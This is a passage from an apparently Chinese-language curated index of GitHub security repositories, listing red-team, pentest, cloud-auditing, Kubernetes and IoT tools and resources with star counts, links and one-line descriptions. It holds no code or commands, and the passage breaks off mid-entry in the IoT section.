[Py] [knownsec/pocsuite](https://github.com/knownsec/pocsuite) This project has stopped to maintenance, please to *** ## <a id="8603294b7c1f136b866b6402d63a9978"></a>文章 ### <a id="f110da0bf67359d3abc62b27d717e55e"></a>新添加的 # <a id="a4ee2f4d4a944b54b2246c72c037cd2e"></a>收集&&集合 *** ## <a id="e97d183e67fa3f530e7d0e7e8c33ee62"></a>未分类 - [**4252**星][22d] [qazbnm456/awesome-web-security](https://github.com/qazbnm456/awesome-web-security) web 安全资源列表 - [**3168**星][8d] [CSS] [juliocesarfort/public-pentesting-reports](https://github.com/juliocesarfort/public-pentesting-reports) Curated list of public penetration test reports released by several consulting firms and academic security groups - [**2904**星][3m] [infosecn1nja/red-teaming-toolkit](https://github.com/infosecn1nja/red-teaming-toolkit) A collection of open source and commercial tools that aid in red team operations. - [**2680**星][4d] [rmusser01/infosec_reference](https://github.com/rmusser01/infosec_reference) An Information Security Reference That Doesn't Suck - [**2529**星][3m] [kbandla/aptnotes](https://github.com/kbandla/aptnotes) Various public documents, whitepapers and articles about APT campaigns - [**2474**星][2m] [Py] [0xinfection/awesome-waf](https://github.com/0xinfection/awesome-waf) - [**2345**星][12d] [yeyintminthuhtut/awesome-red-teaming](https://github.com/yeyintminthuhtut/awesome-red-teaming) List of Awesome Red Teaming Resources - [**2161**星][10m] [exakat/php-static-analysis-tools](https://github.com/exakat/php-static-analysis-tools) A reviewed list of useful PHP static analysis tools - [**2116**星][1m] [infoslack/awesome-web-hacking](https://github.com/infoslack/awesome-web-hacking) A list of web application security - [**2067**星][2d] [tanprathan/mobileapp-pentest-cheatsheet](https://github.com/tanprathan/mobileapp-pentest-cheatsheet) The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics. - [**2066**星][1y] [bluscreenofjeff/red-team-infrastructure-wiki](https://github.com/bluscreenofjeff/red-team-infrastructure-wiki) Wiki to collect Red Team infrastructure hardening resources - [**1930**星][3m] [toolswatch/blackhat-arsenal-tools](https://github.com/toolswatch/blackhat-arsenal-tools) Black Hat 武器库 - [**1845**星][2m] [djadmin/awesome-bug-bounty](https://github.com/djadmin/awesome-bug-bounty) A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups. - [**1760**星][1y] [coreb1t/awesome-pentest-cheat-sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) Collection of the cheat sheets useful for pentesting - [**1752**星][1m] [ngalongc/bug-bounty-reference](https://github.com/ngalongc/bug-bounty-reference) Inspired by - [**1716**星][4m] [R] [briatte/awesome-network-analysis](https://github.com/briatte/awesome-network-analysis) A curated list of awesome network analysis resources. - [**1602**星][7m] [Py] [w1109790800/penetration](https://github.com/w1109790800/penetration) 渗透 超全面的渗透资料 - [**1585**星][7m] [Ruby] [brunofacca/zen-rails-security-checklist](https://github.com/brunofacca/zen-rails-security-checklist) Checklist of security precautions for Ruby on Rails applications. - [**1546**星][9d] [emijrp/awesome-awesome](https://github.com/emijrp/awesome-awesome) A curated list of awesome curated lists of many topics. - [**1534**星][6m] [snowming04/the-hacker-playbook-3-translation](https://github.com/snowming04/the-hacker-playbook-3-translation) 对 The Hacker Playbook 3 的翻译。 - [**1376**星][2m] [grrrdog/java-deserialization-cheat-sheet](https://github.com/grrrdog/java-deserialization-cheat-sheet) The cheat sheet about Java Deserialization vulnerabilities - [**1242**星][1y] [Ruby] [eliotsykes/rails-security-checklist](https://github.com/eliotsykes/rails-security-checklist) - [**1207**星][8m] [joe-shenouda/awesome-cyber-skills](https://github.com/joe-shenouda/awesome-cyber-skills) A curated list of hacking environments where you can train your cyber skills legally and safely - [**1197**星][1m] [Py] [cujanovic/ssrf-testing](https://github.com/cujanovic/ssrf-testing) SSRF (Server Side Request Forgery) testing resources - [**1172**星][7d] [m4ll0k/awesome-hacking-tools](https://github.com/m4ll0k/awesome-hacking-tools) Awesome Hacking Tools - [**1164**星][4d] [w00t3k/awesome-cellular-hacking](https://github.com/w00t3k/awesome-cellular-hacking) Awesome-Cellular-Hacking - [**1145**星][1m] [Batchfile] [ckjbug/hacking](https://github.com/ckjbug/hacking) - [**1116**星][11d] [slowmist/knowledge-base](https://github.com/slowmist/knowledge-base) Knowledge Base 慢雾安全团队知识库 - [**1115**星][1y] [paulsec/awesome-windows-domain-hardening](https://github.com/PaulSec/awesome-windows-domain-hardening) A curated list of awesome Security Hardening techniques for Windows. - [**1110**星][5m] [zbetcheckin/security_list](https://github.com/zbetcheckin/security_list) Great security list for fun and profit - [**1080**星][1m] [guardrailsio/awesome-golang-security](https://github.com/guardrailsio/awesome-golang-security) Awesome Golang Security resources - [**1030**星][7m] [stephenturner/oneliners](https://github.com/stephenturner/oneliners) Useful bash one-liners for bioinformatics. - [**1026**星][7d] [sundowndev/hacker-roadmap](https://github.com/sundowndev/hacker-roadmap) - [**1013**星][1y] [JS] [0xsobky/hackvault](https://github.com/0xsobky/hackvault) A container repository for my public web hacks! - [**993**星][9d] [Py] [jekil/awesome-hacking](https://github.com/jekil/awesome-hacking) Awesome hacking is an awesome collection of hacking tools. - [**986**星][7m] [0x4d31/awesome-threat-detection](https://github.com/0x4d31/awesome-threat-detection) A curated list of awesome threat detection and hunting resources - [**959**星][9m] [wtsxdev/penetration-testing](https://github.com/wtsxdev/penetration-testing) List of awesome penetration testing resources, tools and other shiny things - [**929**星][2m] [tom0li/collection-document](https://github.com/tom0li/collection-document) Collection of quality safety articles - [**921**星][7m] [PS] [api0cradle/ultimateapplockerbypasslist](https://github.com/api0cradle/ultimateapplockerbypasslist) The goal of this repository is to document the most common techniques to bypass AppLocker. - [**917**星][7m] [cn0xroot/rfsec-toolkit](https://github.com/cn0xroot/rfsec-toolkit) RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.无线通信协议相关的工具集,可借助SDR硬件+相关工具对无线通信进行研究。Collect with ♥ by HackSmith - [**906**星][24d] [Shell] [dominicbreuker/stego-toolkit](https://github.com/dominicbreuker/stego-toolkit) Collection of steganography tools - helps with CTF challenges - [**871**星][3d] [explife0011/awesome-windows-kernel-security-development](https://github.com/explife0011/awesome-windows-kernel-security-development) windows kernel security development - [**829**星][5m] [Shell] [danielmiessler/robotsdisallowed](https://github.com/danielmiessler/robotsdisallowed) A curated list of the most common and most interesting robots.txt disallowed directories. - [**823**星][3m] [feeicn/security-ppt](https://github.com/feeicn/security-ppt) 大安全各领域各公司各会议分享的PPT - [**788**星][11m] [v2-dev/awesome-social-engineering](https://github.com/v2-dev/awesome-social-engineering) 社会工程学资源集合 - [**766**星][2m] [daviddias/awesome-hacking-locations](https://github.com/daviddias/awesome-hacking-locations) - [**736**星][1y] [Py] [averagesecurityguy/scripts](https://github.com/averagesecurityguy/scripts) Scripts I use during pentest engagements. - [**728**星][3m] [C#] [harleyqu1nn/aggressorscripts](https://github.com/harleyqu1nn/aggressorscripts) Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources - [**714**星][1y] [snifer/security-cheatsheets](https://github.com/snifer/security-cheatsheets) A collection of cheatsheets for various infosec tools and topics. - [**712**星][5m] [bit4woo/python_sec](https://github.com/bit4woo/python_sec) python安全和代码审计相关资料收集 resource collection of python security and code review - [**685**星][24d] [XSLT] [adon90/pentest_compilation](https://github.com/adon90/pentest_compilation) Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios - [**684**星][2m] [andrewjkerr/security-cheatsheets](https://github.com/andrewjkerr/security-cheatsheets) - [**671**星][1y] [dsasmblr/hacking-online-games](https://github.com/dsasmblr/hacking-online-games) A curated list of tutorials/resources for hacking online games. - [**665**星][1m] [redhuntlabs/awesome-asset-discovery](https://github.com/redhuntlabs/awesome-asset-discovery) List of Awesome Asset Discovery Resources - [**633**星][4m] [3gstudent/pentest-and-development-tips](https://github.com/3gstudent/pentest-and-development-tips) A collection of pentest and development tips - [**632**星][10m] [webbreacher/offensiveinterview](https://github.com/webbreacher/offensiveinterview) Interview questions to screen offensive (red team/pentest) candidates - [**629**星][4m] [bypass007/safety-project-collection](https://github.com/bypass007/safety-project-collection) 收集一些比较优秀的开源安全项目,以帮助甲方安全从业人员构建企业安全能力。 - [**619**星][1y] [jiangsir404/audit-learning](https://github.com/jiangsir404/audit-learning) 记录自己对《代码审计》的理解和总结,对危险函数的深入分析以及在p牛的博客和代码审计圈的收获 - [**613**星][3m] [Shell] [ashishb/osx-and-ios-security-awesome](https://github.com/ashishb/osx-and-ios-security-awesome) OSX and iOS related security tools - [**601**星][1m] [Py] [hslatman/awesome-industrial-control-system-security](https://github.com/hslatman/awesome-industrial-control-system-security) 工控系统安全资源列表 - [**593**星][23d] [lirantal/awesome-nodejs-security](https://github.com/lirantal/awesome-nodejs-security) Awesome Node.js Security resources - [**592**星][12m] [pandazheng/ioshackstudy](https://github.com/pandazheng/ioshackstudy) IOS安全学习资料汇总 - [**571**星][3m] [r35tart/penetration_testing_case](https://github.com/r35tart/penetration_testing_case) 用于记录分享一些有趣的案例 - [**560**星][9m] [guardrailsio/awesome-python-security](https://github.com/guardrailsio/awesome-python-security) Awesome Python Security resources - [**558**星][10m] [guardrailsio/awesome-php-security](https://github.com/guardrailsio/awesome-php-security) Awesome PHP Security Resources - [**530**星][20d] [a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map) Linux内核防御地图 - [**477**星][1y] [hack-with-github/powerful-plugins](https://github.com/hack-with-github/powerful-plugins) Powerful plugins and add-ons for hackers - [**468**星][19d] [meitar/awesome-cybersecurity-blueteam](https://github.com/meitar/awesome-cybersecurity-blueteam) - [**465**星][26d] [gradiuscypher/infosec_getting_started](https://github.com/gradiuscypher/infosec_getting_started) A collection of resources/documentation/links/etc to help people learn about Infosec and break into the field. - [**460**星][4m] [C++] [comaeio/opcde](https://github.com/comaeio/opcde) OPCDE Cybersecurity Conference Materials - [**448**星][7m] [jnusimba/miscsecnotes](https://github.com/jnusimba/miscsecnotes) some learning notes about Web/Cloud/Docker Security、 Penetration Test、 Security Building - [**438**星][1y] [meitar/awesome-lockpicking](https://github.com/meitar/awesome-lockpicking) 有关锁、保险箱、钥匙的指南、工具及其他资源的列表 - [**437**星][4m] [re4lity/hacking-with-golang](https://github.com/re4lity/hacking-with-golang) Golang安全资源合集 - [**426**星][21d] [dropsofzut/awesome-security-weixin-official-accounts](https://github.com/dropsofzut/awesome-security-weixin-official-accounts) 网络安全类公众号推荐,欢迎大家推荐 - [**423**星][12m] [Lua] [w3h/icsmaster](https://github.com/w3h/icsmaster) 整合工控安全相关资源 - [**411**星][5d] [Py] [bl4de/security-tools](https://github.com/bl4de/security-tools) Collection of small security tools created mostly in Python. CTFs, pentests and so on - [**411**星][1m] [husnainfareed/awesome-ethical-hacking-resources](https://github.com/husnainfareed/Awesome-Ethical-Hacking-Resources) - [**407**星][8m] [kai5263499/osx-security-awesome](https://github.com/kai5263499/osx-security-awesome) A collection of OSX and iOS security resources - [**397**星][7m] [HTML] [gexos/hacking-tools-repository](https://github.com/gexos/hacking-tools-repository) A list of security/hacking tools that have been collected from the internet. Suggestions are welcomed. - [**392**星][2m] [dsopas/assessment-mindset](https://github.com/dsopas/assessment-mindset) 安全相关的思维导图, 可用于pentesting, bug bounty, red-teamassessments - [**383**星][2m] [thejambo/awesome-testing](https://github.com/thejambo/awesome-testing) A curated list of testing resources - [**375**星][8m] [opencybertranslationproject/linux-basics-for-hackers](https://github.com/opencybertranslationproject/linux-basics-for-hackers) 书籍《Linux Basics for Hackers》2019版中文翻译版 - [**369**星][20d] [fkromer/awesome-ros2](https://github.com/fkromer/awesome-ros2) The Robot Operating System Version 2.0 is awesome! - [**363**星][3d] [hongrisec/web-security-attack](https://github.com/hongrisec/web-security-attack) Web安全相关内容 - [**345**星][2m] [softwareunderground/awesome-open-geoscience](https://github.com/softwareunderground/awesome-open-geoscience) Curated from repositories that make our lives as geoscientists, hackers and data wranglers easier or just more awesome - [**335**星][t] [stamparm/ipsum](https://github.com/stamparm/ipsum) Daily feed of bad IPs (with blacklist hit scores) - [**334**星][5d] [PS] [mgeeky/penetration-testing-tools](https://github.com/mgeeky/penetration-testing-tools) A collection of my Penetration Testing scripts, tools, cheatsheets collected over years, used during real-world assignments or collected from various good quality sources. - [**327**星][9m] [pxlpnk/awesome-ruby-security](https://github.com/pxlpnk/awesome-ruby-security) Awesome Ruby Security resources - [**321**星][2m] [HTML] [eugenekolo/sec-tools](https://github.com/eugenekolo/sec-tools) A set of security related tools - [**318**星][3d] [cryptax/confsec](https://github.com/cryptax/confsec) Security, hacking conferences (list) - [**315**星][22d] [trimstray/technical-whitepapers](https://github.com/trimstray/technical-whitepapers) 收集:IT白皮书、PPT、PDF、Hacking、Web应用程序安全性、数据库、逆向等 - [**312**星][10m] [Shell] [swoodford/aws](https://github.com/swoodford/aws) A collection of bash shell scripts for automating various tasks with Amazon Web Services using the AWS CLI and jq. - [**310**星][1y] [1522402210/2018-blackhat-tools-list](https://github.com/1522402210/2018-blackhat-tools-list) 2018 BlackHat Tools List - [**309**星][2m] [no-github/dork-admin](https://github.com/no-github/dork-admin) 盘点近年来的数据泄露、供应链污染事件 - [**299**星][15d] [JS] [aws-samples/aws-serverless-security-workshop](https://github.com/aws-samples/aws-serverless-security-workshop) In this workshop, you will learn techniques to secure a serverless application built with AWS Lambda, Amazon API Gateway and RDS Aurora. We will cover AWS services and features you can leverage to improve the security of a serverless applications in 5 domains: identity & access management, code, data, infrastructure, logging & monitoring. - [**295**星][1y] [findneo/newbie-security-list](https://github.com/findneo/newbie-security-list) 网络安全学习资料,欢迎补充 - [**294**星][7m] [JS] [ma3k4h3d/papers](https://github.com/ma3k4h3d/papers) Some papers about cyber security - [**287**星][10m] [wallarm/awesome-nginx-security](https://github.com/wallarm/awesome-nginx-security) - [**276**星][4m] [mattnotmax/cyberchef-recipes](https://github.com/mattnotmax/cyberchef-recipes) A list of cyber-chef recipes - [**272**星][8d] [JS] [ropnop/serverless_toolkit](https://github.com/ropnop/serverless_toolkit) A collection of useful Serverless functions I use when pentesting - [**260**星][5m] [zhaoweiho/web-sec-interview](https://github.com/zhaoweiho/web-sec-interview) Information Security (Web Security/Penetration Testing Direction) Interview Questions/Solutions 信息安全(Web安全/渗透测试方向)面试题/解题思路 - [**260**星][27d] [thelsa/cs-checklist](https://github.com/thelsa/cs-checklist) PC客户端(C-S架构)渗透测试checklist / Client side(C-S) penestration checklist - [**243**星][7d] [euphrat1ca/security_w1k1](https://github.com/euphrat1ca/security_w1k1) collect - [**239**星][6d] [pe3zx/my-infosec-awesome](https://github.com/pe3zx/my-infosec-awesome) My curated list of awesome links, resources and tools on infosec related topics - [**228**星][6m] [guardrailsio/awesome-dotnet-security](https://github.com/guardrailsio/awesome-dotnet-security) Awesome .NET Security Resources - [**223**星][5d] [decalage2/awesome-security-hardening](https://github.com/decalage2/awesome-security-hardening) A collection of awesome security hardening guides, tools and other resources - [**222**星][9m] [jesusprubio/awesome-nodejs-pentest](https://github.com/jesusprubio/awesome-nodejs-pentest) - [**221**星][4m] [security-checklist/php-security-check-list](https://github.com/security-checklist/php-security-check-list) PHP Security Check List [ EN ] - [**216**星][10m] [puresec/awesome-serverless-security](https://github.com/puresec/awesome-serverless-security) A curated list of awesome serverless security resources such as (e)books, articles, whitepapers, blogs and research papers. - [**214**星][3d] [shogunlab/awesome-hyper-v-exploitation](https://github.com/shogunlab/awesome-hyper-v-exploitation) A curated list of Hyper-V exploitation resources, fuzzing and vulnerability research. - [**213**星][10m] [jeansgit/redteam](https://github.com/jeansgit/redteam) RedTeam资料收集整理 - [**213**星][3m] [Shell] [xu-jian/vps](https://github.com/xu-jian/vps) 个人笔记汇总 - [**209**星][28d] [sigp/solidity-security-blog](https://github.com/sigp/solidity-security-blog) Comprehensive list of known attack vectors and common anti-patterns - [**207**星][1y] [faizann24/resources-for-learning-hacking](https://github.com/faizann24/resources-for-learning-hacking) All the resources I could find for learning Ethical Hacking and penetration testing. *** ## <a id="664ff1dbdafefd7d856c88112948a65b"></a>混合型收集 - [**24868**星][8d] [trimstray/the-book-of-secret-knowledge](https://github.com/trimstray/the-book-of-secret-knowledge) A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more. - [**10920**星][26d] [enaqx/awesome-pentest](https://github.com/enaqx/awesome-pentest) 渗透测试资源/工具集 - [**5513**星][9m] [carpedm20/awesome-hacking](https://github.com/carpedm20/awesome-hacking) Hacking教程、工具和资源 - [**5121**星][2m] [sbilly/awesome-security](https://github.com/sbilly/awesome-security) 与安全相关的软件、库、文档、书籍、资源和工具等收集 - [**3230**星][6d] [Rich Text Format] [the-art-of-hacking/h4cker](https://github.com/The-Art-of-Hacking/h4cker) 资源收集:hacking、渗透、数字取证、事件响应、漏洞研究、漏洞开发、逆向 - [**1904**星][20d] [olivierlaflamme/cheatsheet-god](https://github.com/olivierlaflamme/cheatsheet-god) Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet - [**591**星][6d] [Perl] [bollwarm/sectoolset](https://github.com/bollwarm/sectoolset) 安全项目工具集合 - [**587**星][6m] [d30sa1/rootkits-list-download](https://github.com/d30sa1/rootkits-list-download) Rootkit收集 *** ## <a id="67acc04b20c99f87ee625b073330d8c2"></a>无工具类收集 - [**34045**星][21d] [Py] [minimaxir/big-list-of-naughty-strings](https://github.com/minimaxir/big-list-of-naughty-strings) “淘气”的字符串列表,当作为用户输入时很容易引发问题 - [**9042**星][3m] [vitalysim/awesome-hacking-resources](https://github.com/vitalysim/awesome-hacking-resources) A collection of hacking / penetration testing resources to make you better! - [**3616**星][9d] [blacckhathaceekr/pentesting-bible](https://github.com/blacckhathaceekr/pentesting-bible) links reaches 10000 links & 10000 pdf files .Learn Ethical Hacking and penetration testing .hundreds of ethical hacking & penetration testing & red team & cyber security & computer science resources. - [**2800**星][2m] [secwiki/sec-chart](https://github.com/secwiki/sec-chart) 安全思维导图集合 - [**2671**星][1y] [HTML] [chybeta/web-security-learning](https://github.com/chybeta/web-security-learning) Web-Security-Learning - [**2519**星][17d] [onlurking/awesome-infosec](https://github.com/onlurking/awesome-infosec) A curated list of awesome infosec courses and training resources. - [**2356**星][11m] [hack-with-github/free-security-ebooks](https://github.com/hack-with-github/free-security-ebooks) Free Security and Hacking eBooks - [**2118**星][3m] [yeahhub/hacking-security-ebooks](https://github.com/yeahhub/hacking-security-ebooks) Top 100 Hacking & Security E-Books (Free Download) - [**1956**星][1m] [Py] [nixawk/pentest-wiki](https://github.com/nixawk/pentest-wiki) PENTEST-WIKI is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others. - [**1955**星][1m] [hmaverickadams/beginner-network-pentesting](https://github.com/hmaverickadams/beginner-network-pentesting) Notes for Beginner Network Pentesting Course *** ## <a id="24707dd322098f73c7e450d6b1eddf12"></a>收集类的收集 - [**33101**星][3m] [hack-with-github/awesome-hacking](https://github.com/hack-with-github/awesome-hacking) A collection of various awesome lists for hackers, pentesters and security researchers *** ## <a id="9101434a896f20263d09c25ace65f398"></a>教育资源&&课程&&教程&&书籍 - [**10944**星][2m] [CSS] [hacker0x01/hacker101](https://github.com/hacker0x01/hacker101) Hacker101 - [**3945**星][4m] [PHP] [paragonie/awesome-appsec](https://github.com/paragonie/awesome-appsec) A curated list of resources for learning about application security - [**959**星][5m] [bugcrowd/bugcrowd_university](https://github.com/bugcrowd/bugcrowd_university) 研究者社区的教育内容 - [**936**星][7m] [Py] [osirislab/hack-night](https://github.com/osirislab/Hack-Night) a sobering introduction to offensive security *** ## <a id="8088e46fc533286d88b945f1d472bf57"></a>笔记&&Tips&&Tricks ### <a id="f57ccaab4279b60c17a03f90d96b815c"></a>未分类 - [**2816**星][2m] [paulsec/awesome-sec-talks](https://github.com/paulsec/awesome-sec-talks) A collected list of awesome security talks - [**864**星][2d] [Py] [lylemi/learn-web-hacking](https://github.com/lylemi/learn-web-hacking) Web安全学习笔记 - [**723**星][3m] [uknowsec/active-directory-pentest-notes](https://github.com/uknowsec/active-directory-pentest-notes) 个人域渗透学习笔记 - [**593**星][1m] [PS] [threatexpress/red-team-scripts](https://github.com/threatexpress/red-team-scripts) A collection of Red Team focused tools, scripts, and notes ### <a id="0476f6b97e87176da0a0d7328f8747e7"></a>blog - [**1229**星][5m] [chalker/notes](https://github.com/chalker/notes) Some public notes *** ## <a id="df8ec4a66ef5027bbcc591c94f8de1e5"></a>Talk&&Conference *** ## <a id="4be58a3a00f83975b0321425db3b9b68"></a>文档&&Documentation&&规则说明&&RFC - [**1705**星][10m] [CSS] [bagder/http2-explained](https://github.com/bagder/http2-explained) A detailed document explaining and documenting HTTP/2, the successor to the widely popular HTTP/1.1 protocol # <a id="7e840ca27f1ff222fd25bc61a79b07ba"></a>特定目标 *** ## <a id="eb2d1ffb231cee014ed24d59ca987da2"></a>未分类-XxTarget - [**4177**星][4d] [Java] [spring-projects/spring-security](https://github.com/spring-projects/spring-security) Spring Security - [**2942**星][6d] [Go] [securego/gosec](https://github.com/securego/gosec) Golang security checker - [**1906**星][2m] [Py] [pycqa/bandit](https://github.com/pycqa/bandit) 在Python代码中查找常见的安全问题 *** ## <a id="c71ad1932bbf9c908af83917fe1fd5da"></a>AWS - [**4471**星][1y] [Go] [wallix/awless](https://github.com/wallix/awless) A Mighty CLI for AWS - [**4271**星][4m] [Py] [dxa4481/trufflehog](https://github.com/dxa4481/trufflehog) Searches through git repositories for high entropy strings and secrets, digging deep into commit history - [**3301**星][5d] [Shell] [toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc. - [**3154**星][5d] [JS] [duo-labs/cloudmapper](https://github.com/duo-labs/cloudmapper) 生成AWS环境的网络拓扑图 - [**2895**星][3d] [Go] [99designs/aws-vault](https://github.com/99designs/aws-vault) A vault for securely storing and accessing AWS credentials in development environments - [**2645**星][4m] [Java] [teevity/ice](https://github.com/teevity/ice) AWS Usage Tool - [**2374**星][5m] [Go] [mlabouardy/komiser](https://github.com/mlabouardy/komiser) - [**1912**星][6d] [Shell] [toniblyx/prowler](https://github.com/toniblyx/prowler) AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and DOZENS of additional checks including GDPR and HIPAA (+100). Official CIS for AWS guide: - [**1895**星][3d] [Py] [mozilla/mozdef](https://github.com/mozilla/mozdef) Mozilla Enterprise Defense Platform - [**1604**星][1y] [Py] [nccgroup/scout2](https://github.com/nccgroup/Scout2) Security auditing tool for AWS environments - [**1386**星][12m] [Py] [eth0izzle/bucket-stream](https://github.com/eth0izzle/bucket-stream) 通过certstream 监控多种证书 transparency 日志, 进而查找有趣的 Amazon S3 Buckets - [**1198**星][17d] [Py] [lyft/cartography](https://github.com/lyft/cartography) Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database. - [**1149**星][4m] [Py] [rhinosecuritylabs/pacu](https://github.com/rhinosecuritylabs/pacu) The AWS exploitation framework, designed for testing the security of Amazon Web Services environments. - [**938**星][3m] [Py] [sa7mon/s3scanner](https://github.com/sa7mon/s3scanner) Scan for open AWS S3 buckets and dump the contents - [**844**星][26d] [Py] [jordanpotti/awsbucketdump](https://github.com/jordanpotti/awsbucketdump) 快速枚举 AWS S3 Buckets,查找感兴趣的文件。类似于子域名爆破,但针对S3 Bucket,有额外功能,例如下载文件等 - [**814**星][7d] [Go] [rebuy-de/aws-nuke](https://github.com/rebuy-de/aws-nuke) Nuke a whole AWS account and delete all its resources. - [**804**星][2d] [Py] [awslabs/aws-config-rules](https://github.com/awslabs/aws-config-rules) [Node, Python, Java] Repository of sample Custom Rules for AWS Config. - [**786**星][11d] [Go] [liamg/tfsec](https://github.com/liamg/tfsec) - [**774**星][13d] [Java] [tmobile/pacbot](https://github.com/tmobile/pacbot) PacBot (Policy as Code Bot) - [**613**星][3m] [Py] [netflix/repokid](https://github.com/netflix/repokid) AWS Least Privilege for Distributed, High-Velocity Deployment - [**609**星][21d] [Shell] [securityftw/cs-suite](https://github.com/securityftw/cs-suite) Cloud Security Suite - One stop tool for auditing the security posture of AWS/GCP/Azure infrastructure. - [**563**星][3m] [Shell] [denizparlak/zeus](https://github.com/denizparlak/zeus) AWS Auditing & Hardening Tool - [**548**星][9d] [Ruby] [stelligent/cfn_nag](https://github.com/stelligent/cfn_nag) Linting tool for CloudFormation templates - [**539**星][4d] [Py] [salesforce/policy_sentry](https://github.com/salesforce/policy_sentry) IAM Least Privilege Policy Generator - [**505**星][3m] [Py] [awslabs/aws-security-benchmark](https://github.com/awslabs/aws-security-benchmark) Open source demos, concept and guidance related to the AWS CIS Foundation framework. - [**485**星][19d] [Py] [netflix-skunkworks/diffy](https://github.com/netflix-skunkworks/diffy) Diffy is a triage tool used during cloud-centric security incidents, to help digital forensics and incident response (DFIR) teams quickly identify suspicious hosts on which to focus their response. - [**462**星][8m] [Py] [ustayready/fireprox](https://github.com/ustayready/fireprox) AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation - [**409**星][2m] [Ruby] [arkadiyt/aws_public_ips](https://github.com/arkadiyt/aws_public_ips) Fetch all public IP addresses tied to your AWS account. Works with IPv4/IPv6, Classic/VPC networking, and across all AWS services - [**400**星][4m] [Py] [duo-labs/cloudtracker](https://github.com/duo-labs/cloudtracker) CloudTracker helps you find over-privileged IAM users and roles by comparing CloudTrail logs with current IAM policies. - [**389**星][2m] [Py] [riotgames/cloud-inquisitor](https://github.com/riotgames/cloud-inquisitor) Enforce ownership and data security within AWS - [**370**星][11m] [Py] [awslabs/aws-security-automation](https://github.com/awslabs/aws-security-automation) Collection of scripts and resources for DevSecOps and Automated Incident Response Security - [**365**星][7m] [Py] [carnal0wnage/weirdaal](https://github.com/carnal0wnage/weirdaal) WeirdAAL (AWS Attack Library) - [**343**星][2m] [Ruby] [anaynayak/aws-security-viz](https://github.com/anaynayak/aws-security-viz) Visualize your aws security groups. - [**321**星][1y] [Py] [securing/dumpsterdiver](https://github.com/securing/dumpsterdiver) Tool to search secrets in various filetypes. - [**292**星][8m] [Py] [cesar-rodriguez/terrascan](https://github.com/cesar-rodriguez/terrascan) Collection of security and best practice test for static code analysis of terraform templates - [**289**星][1y] [Py] [nccgroup/aws-inventory](https://github.com/nccgroup/aws-inventory) 发现在AWS账户中创建的资源 - [**274**星][2m] [Py] [nccgroup/pmapper](https://github.com/nccgroup/pmapper) A tool for quickly evaluating IAM permissions in AWS. - [**260**星][11d] [Py] [voulnet/barq](https://github.com/voulnet/barq) The AWS Cloud Post Exploitation framework! - [**258**星][14d] [Jupyter Notebook] [aws-samples/aws-security-workshops](https://github.com/aws-samples/aws-security-workshops) A collection of the latest AWS Security workshops - [**242**星][6d] [HCL] [nozaq/terraform-aws-secure-baseline](https://github.com/nozaq/terraform-aws-secure-baseline) Terraform module to set up your AWS account with the secure baseline configuration based on CIS Amazon Web Services Foundations. - [**224**星][10d] [Dockerfile] [thinkst/canarytokens-docker](https://github.com/thinkst/canarytokens-docker) Docker configuration to quickly setup your own Canarytokens. - [**204**星][17d] [stuhirst/awssecurity](https://github.com/stuhirst/awssecurity) for AWS Security material - [**203**星][6m] [Py] [dowjones/hammer](https://github.com/dowjones/hammer) Dow Jones Hammer : Protect the cloud with the power of the cloud(AWS) *** ## <a id="88716f4591b1df2149c2b7778d15d04e"></a>Phoenix - [**820**星][5d] [Elixir] [nccgroup/sobelow](https://github.com/nccgroup/sobelow) Phoenix 框架安全方面的静态分析工具(Phoenix 框架:支持对webUI,接口, web性能,mobile app 或 mobile browser 进行自动化测试和监控的平台) *** ## <a id="4fd96686a470ff4e9e974f1503d735a2"></a>Kubernetes - [**1895**星][23d] [Py] [aquasecurity/kube-hunter](https://github.com/aquasecurity/kube-hunter) Hunt for security weaknesses in Kubernetes clusters - [**582**星][2m] [Go] [shopify/kubeaudit](https://github.com/shopify/kubeaudit) kubeaudit helps you audit your Kubernetes clusters against common security controls - [**385**星][2m] [Shell] [kabachook/k8s-security](https://github.com/kabachook/k8s-security) Kubernetes security notes and best practices - [**211**星][9m] [Go] [cloudflare/cloudflare-ingress-controller](https://github.com/cloudflare/cloudflare-ingress-controller) A Kubernetes ingress controller for Cloudflare's Argo Tunnels *** ## <a id="786201db0bcc40fdf486cee406fdad31"></a>Azure *** ## <a id="40dbffa18ec695a618eef96d6fd09176"></a>Nginx - [**6211**星][2m] [Py] [yandex/gixy](https://github.com/yandex/gixy) Nginx 配置静态分析工具,防止配置错误导致安全问题,自动化错误配置检测 *** ## <a id="6b90a3993f9846922396ec85713dc760"></a>ELK - [**1945**星][4d] [CSS] [cyb3rward0g/helk](https://github.com/cyb3rward0g/helk) 对ELK栈进行分析,具备多种高级功能,例如SQL声明性语言,图形,结构化流,机器学习等 *** ## <a id="6730dabeca61fcf64d4f7631abae6734"></a>GoogleCloud&&谷歌云 - [**1066**星][2d] [Py] [forseti-security/forseti-security](https://github.com/forseti-security/forseti-security) A community-driven collection of open source tools to improve the security of your Google Cloud Platform environments # <a id="d55d9dfd081aa2a02e636b97ca1bad0b"></a>物联网(IoT)&&嵌入式设备&&路由器&&交换机&&智能设备&&打印机 *** ## <a id="9a20a70f58ea7946f24224c5d73fac15"></a>工具 ### <a id="cda63179d132f43441f8844c5df10024"></a>未分类-IoT - [**1218**星][] [C] [dgiese/dustcloud](https://github.com/dgiese/dustcloud) Xiaomi Smart Home Device Reverse Engineering and Hacking - [**1145**星][7m] [nebgnahz/awesome-iot-hacks](https://github.com/nebgnahz/awesome-iot-hacks) A Collection of Hacks in IoT Space so that we can address them (hopefully). - [**1049**星][29d] [Py] 